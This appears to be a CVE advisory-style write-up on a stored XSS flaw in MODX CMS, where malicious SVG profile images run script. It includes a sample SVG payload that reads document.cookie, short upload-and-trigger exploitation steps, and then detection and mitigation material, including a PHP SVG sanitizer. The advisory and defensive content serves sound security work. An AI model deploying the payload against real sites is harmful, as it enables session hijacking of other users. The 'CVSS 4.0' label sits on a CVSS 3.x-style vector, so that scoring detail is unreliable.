How the CVE Works:
CVE-2025-28010 is a stored XSS vulnerability in MODX CMS (<3.1.0) due to improper SVG file validation. Authenticated users can upload malicious SVG files containing JavaScript payloads as profile images. When another user views the infected profile, the embedded script executes in their browser, enabling session hijacking, phishing, or malware delivery. The attack persists because MODX fails to sanitize SVG markup before rendering.
DailyCVE Form:
Platform: MODX CMS
Version: <3.1.0
Vulnerability: Stored XSS via SVG
Severity: Critical
Date: 04/04/2025
What Undercode Say:
Exploitation:
1. Craft malicious SVG:
<svg xmlns="http://www.w3.org/2000/svg" onload="alert('XSS')"> <script>alert(document.cookie)</script> </svg>
2. Upload as profile image in MODX.
3. Trigger payload when victim views the profile.
Detection:
grep -r "image/svg+xml" /var/www/modx/core/components/
Mitigation:
1. Upgrade to MODX 3.1.0+.
2. Implement CSP headers:
# 'unsafe-inline' in script-src would still permit the inline <script> and onload handlers an SVG carries, so keep script-src to 'self'.
# The header must be emitted on the SVG response itself (the policy of the page that embeds it via <img> does not apply when the SVG is opened as a document).
add_header Content-Security-Policy "default-src 'self'; img-src 'self' data:; script-src 'self'" always;
3. Sanitize SVGs server-side:
$svg = preg_replace('/<script\b[^>]*>(.*?)<\/script>/is', '', $svg); // removes <script> blocks only; onload= and other event-handler attributes survive, so pair this with DOM-based attribute stripping
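The grep in the Detection section and the one-line regex above both miss the attribute-based variant (the onload handler in the sample payload). The following PHP is an added example, not MODX code and not from the advisory: it parses an SVG with ext-dom, reports every element or attribute that can run script (detection, usable over an upload directory), and strips them (mitigation). It assumes PHP 8 with ext-dom; UPLOAD_DIR is a placeholder path and the function names are mine.

```php
<?php
// Added example, not MODX code. Assumes PHP 8 with ext-dom; UPLOAD_DIR is a placeholder.
declare(strict_types=1);

const UPLOAD_DIR = '/path/to/modx/assets/profile-images';  // placeholder (assumption)
// Elements that can execute script or embed foreign content inside an SVG.
const ACTIVE_ELEMENTS = ['script', 'foreignObject', 'iframe', 'embed', 'object'];

// Parse an SVG without network access or entity expansion; null on anything unexpected.
function load_svg(string $svg): ?DOMDocument
{
    $doc = new DOMDocument();
    $prev = libxml_use_internal_errors(true);
    $ok = $doc->loadXML($svg, LIBXML_NONET | LIBXML_NOBLANKS);  // LIBXML_NOENT deliberately not set
    libxml_clear_errors();
    libxml_use_internal_errors($prev);
    // Reject malformed input, any DOCTYPE (entity tricks) and documents whose root is not <svg>.
    if (!$ok || $doc->doctype !== null || $doc->documentElement?->localName !== 'svg') {
        return null;
    }
    return $doc;
}

// Reason an attribute can run script, or null if it is harmless by these rules.
function attribute_risk(DOMAttr $attr): ?string
{
    $name = strtolower($attr->localName ?? $attr->nodeName);
    if (str_starts_with($name, 'on')) {
        return "event handler {$attr->nodeName}";
    }
    if (in_array($name, ['href', 'src'], true)) {
        // Browsers ignore ASCII control characters and spaces inside a scheme, so strip them first.
        $scheme = strtolower(preg_replace('/[\x00-\x20]+/', '', $attr->value));
        if (str_starts_with($scheme, 'javascript:')) {
            return "javascript: URL in {$attr->nodeName}";
        }
    }
    return null;
}

// Detection: every element or attribute in the document that could execute script.
function svg_findings(DOMDocument $doc): array
{
    $findings = [];
    foreach ((new DOMXPath($doc))->query('//*') as $el) {
        if (in_array($el->localName, ACTIVE_ELEMENTS, true)) {
            $findings[] = "element <{$el->localName}>";
        }
        foreach (iterator_to_array($el->attributes, false) as $attr) {
            if (($why = attribute_risk($attr)) !== null) {
                $findings[] = "{$why} on <{$el->localName}>";
            }
        }
    }
    return $findings;
}

// Mitigation: drop active elements and attributes; null means the input was not a valid SVG.
function sanitize_svg(string $svg): ?string
{
    $doc = load_svg($svg);
    if ($doc === null) {
        return null;
    }
    $xpath = new DOMXPath($doc);
    $drop = [];  // snapshot first: removing nodes while walking a live NodeList skips siblings
    foreach ($xpath->query('//*') as $el) {
        if (in_array($el->localName, ACTIVE_ELEMENTS, true)) {
            $drop[] = $el;
        }
    }
    foreach ($drop as $el) {
        $el->parentNode?->removeChild($el);
    }
    foreach ($xpath->query('//*') as $el) {
        foreach (iterator_to_array($el->attributes, false) as $attr) {
            if (attribute_risk($attr) !== null) {
                $el->removeAttributeNode($attr);
            }
        }
    }
    $out = $doc->saveXML();
    return $out === false ? null : $out;
}

// Detection over a directory: inspect content, not extension, so renamed SVGs are still caught.
function scan_upload_dir(string $dir): array
{
    $report = [];
    if (!is_dir($dir)) {
        return $report;
    }
    $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS));
    foreach ($files as $file) {
        $path = $file->getPathname();
        if (!preg_match('/^\s*(<\?xml|<svg)/i', (string) file_get_contents($path, false, null, 0, 512))) {
            continue;
        }
        $doc = load_svg((string) file_get_contents($path));
        $findings = $doc === null ? ['unparseable or non-SVG root'] : svg_findings($doc);
        if ($findings !== []) {
            $report[$path] = $findings;
        }
    }
    return $report;
}

// Constructed sample with the same shape as the payload described above.
const SAMPLE_SVG = <<<'SVG'
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert('XSS')">
  <script>alert(document.cookie)</script>
  <a xlink:href="javascript:alert(1)"><circle r="10"/></a>
</svg>
SVG;

$doc = load_svg(SAMPLE_SVG);
print_r($doc === null ? ['not a valid SVG'] : svg_findings($doc));  // three findings for the sample
echo sanitize_svg(SAMPLE_SVG);                                       // only the <a><circle/></a> subtree remains
print_r(scan_upload_dir(UPLOAD_DIR));
```

Stripping is a fallback: the simpler fix for avatar uploads is to reject SVG outright (validate the decoded image type, not the extension or the client-supplied MIME type) or to serve user uploads from a separate origin with `Content-Disposition: attachment`. If SVG must be kept, a maintained sanitizer library covers more cases (CSS `url()`, `<use>` references, animation attributes) than the allow/deny lists in this example.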
Analytics:
- Attack Vector: Network (HTTP)
- Privilege Required: Low (authenticated user)
- User Interaction: Required (viewing profile)
- CVSS 4.0: 9.1 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H)
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-28010
Extra Source Hub:
Undercode